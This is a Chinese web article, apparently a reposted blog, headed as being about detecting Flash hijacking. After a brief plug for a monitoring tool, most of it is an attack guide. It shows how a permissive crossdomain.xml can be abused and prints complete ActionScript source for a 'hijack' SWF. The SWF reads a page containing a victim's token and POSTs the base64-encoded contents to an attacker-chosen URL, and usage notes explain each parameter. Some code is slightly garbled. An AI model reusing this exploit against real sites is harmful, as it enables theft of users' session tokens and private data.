溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

flash劫持問題如何可以檢測(cè)?

發(fā)布時(shí)間:2020-03-03 07:12:45 來源:網(wǎng)絡(luò) 閱讀:325 作者:四大天王998 欄目:網(wǎng)絡(luò)安全

通過什么樣的辦法檢測(cè)flash是否被劫持?
  iis7網(wǎng)站監(jiān)控
  網(wǎng)站的劫持、污染、flash劫持可檢測(cè)。
  Flash 劫持
  當(dāng)我們?cè)谕趕rc漏洞的時(shí)候,找到一個(gè)接口或者一個(gè)頁面response內(nèi)容,存在用戶的token或者用戶唯一標(biāo)識(shí)的信息的時(shí)候,著要訪問www..com/crossdomain.xml
  <cross-domain-policy>
  <allow-access-from domain=".qq.com"/>
  <allow-access-from domain=".gtimg.com"/>
  </cross-domain-policy>
  存在以上的情況,著要在.com找到一個(gè)可以上傳圖片的就可以進(jìn)行劫持用戶權(quán)限。
  hijack源碼:
  package {
  import flash.display.Sprite;
  import flash.events.Event;
  import flash.net.;
  import flash.utils.ByteArray;
  import flash.text.TextField;
  public class hijack extends Sprite
  {
  private static const _encodeChars:Vector.<int> = _initEncoreChar();
  public function hijack()
  {
  var params:Object=root.loaderInfo.parameters;
  var jpg:URLRequest = new URLRequest(params.jpg);
  jpg.method = URLRequestMethod.GET;
  sendToURL(jpg);
  var request:URLRequest = new URLRequest(params.get);
  request.method = URLRequestMethod.GET;
  var loader:URLLoader=new URLLoader();
  loader.addEventListener(Event.COMPLETE,completeHandler);
  function completeHandler(event:Event):void{
  var data:String=(loader.data);
  var postURLrequest:URLRequest = new URLRequest(params.post);
  postURLrequest.method = URLRequestMethod.POST;
  var postdata:Object = new Array();
  postdata[0]=encode(data);
  postURLrequest.data = postdata[0];
  sendToURL(postURLrequest);
  }
  loader.load(request);
  }
  public static function encode(data:String):String {
  var bytes:ByteArray = new ByteArray();
  bytes.writeUTFBytes(data);
  return encodeByteArray(bytes);
  }
  public static function encodeByteArray(data:ByteArray):String {
  var out:ByteArray = new ByteArray();
  //Presetting the length keep the memory smaller and optimize speed since there is no "grow" needed
  out.length = (2 + data.length - ((data.length + 2) % 3)) 4 / 3; //Preset length //1.6 to 1.5 ms
  var i:int = 0;
  var r:int = data.length % 3;
  var len:int = data.length - r;
  var c:uint; //read (3) character AND write (4) characters
  var outPos:int = 0;
  while(i < len) {
  //Read 3 Characters (8bit * 3 = 24 bits)
  c = data[int(i++)] << 16 | data[int(i++)] << 8 | data[int(i++)];
  out[int(outPos++)] = _encodeChars[int(c >>> 18)];
  out[int(outPos++)] = _encodeChars[int(c >>> 12 & 0x3f)];
  out[int(outPos++)] = _encodeChars[int(c >>> 6 & 0x3f)];
  out[int(outPos++)] = _encodeChars[int(c & 0x3f)];
  }
  //Need two "=" padding
  if(r == 1) {
  //Read one char, write two chars, write padding
  c = data[int(i)];
  out[int(outPos++)] = _encodeChars[int(c >>> 2)];
  out[int(outPos++)] = _encodeChars[int((c & 0x03) << 4)];
  out[int(outPos++)] = 61;
  out[int(outPos++)] = 61;
  }
  //Need one "=" padding
  else if(r == 2) {
  c = data[int(i++)] << 8 | data[int(i)];
  out[int(outPos++)] = _encodeChars[int(c >>> 10)];
  out[int(outPos++)] = _encodeChars[int(c >>> 4 & 0x3f)];
  out[int(outPos++)] = _encodeChars[int((c & 0x0f) << 2)];
  out[int(outPos++)] = 61;
  }
  return out.readUTFBytes(out.length);
  }
  private static function _initEncoreChar():Vector.<int> {
  var encodeChars:Vector.<int> = new Vector.<int>(64, true);
  // We could push the number directly
  // but I think it's nice to see the characters (with no overhead on encode/decode)
  var chars:String = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  for(var i:int = 0; i<64; i++) {
  encodeChars[i] = chars.charCodeAt(i);
  }
  return encodeChars;
  }
  }
  }
  參數(shù)說明:
  jpg:域下的圖片(為了優(yōu)先加載crossdomain.xml,否則劫持的接口加載太慢會(huì)導(dǎo)致無法劫持)
  get:劫持的接口或者頁面
  post:接收劫持過來的頁面為base64傳輸

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI